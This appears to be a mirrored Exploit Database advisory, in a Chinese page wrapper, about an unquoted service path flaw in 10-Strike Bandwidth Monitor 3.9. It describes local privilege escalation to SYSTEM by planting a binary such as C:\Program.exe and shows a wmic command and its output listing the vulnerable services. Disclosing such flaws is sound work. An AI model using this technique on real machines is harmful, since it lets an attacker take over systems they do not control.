Bandwidth Monitor 3.9 – ‘Svc10StrikeBandMontitor’ Unquoted Service Path

• Exploit Database
• 15 阅读

• 作者： boku
  日期： 2020-06-16
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48591/

• # Exploit Title: Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path
  # Exploit Author: Bobby Cooke
  # Date: 2020-07-15
  # Vendor Site: https://www.10-strike.com/
  # Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
  # Tested On: Windows 10 - Pro 1909 (x86)
  # Version: Version 3.9
  
  # Vulnerability Type: 
  # Local Privilege Escalation to LocalSystem by Unquoted Service Path.
  
  # Vulnerability Description:
  # The 10-Strike Bandwidth Monitor v3.9 services "Svc10StrikeBandMontitor", "Svc10StrikeBMWD", and "Svc10StrikeBMAgent" suffer 
  # from unquoted service path vulnerabilities that allow attackers to achieve Privilege Escalation to SYSTEM, at startup, 
  # by placing a malicious binary in the truncated service path; such as "C:\Program.exe".
  
  C:\Users\boku>wmic service get name,pathname,startmode,StartName | findstr "10-Strike Bandwidth Monitor"
  Svc10StrikeBandMonitorC:\Program Files\10-Strike Bandwidth Monitor\BMsvc.exeAuto LocalSystem
  Svc10StrikeBMWD C:\Program Files\10-Strike Bandwidth Monitor\BMWDsvc.exeAuto LocalSystem
  Svc10StrikeBMAgentC:\Program Files\10-Strike Bandwidth Monitor Agent\BMAgent.exeAuto LocalSystem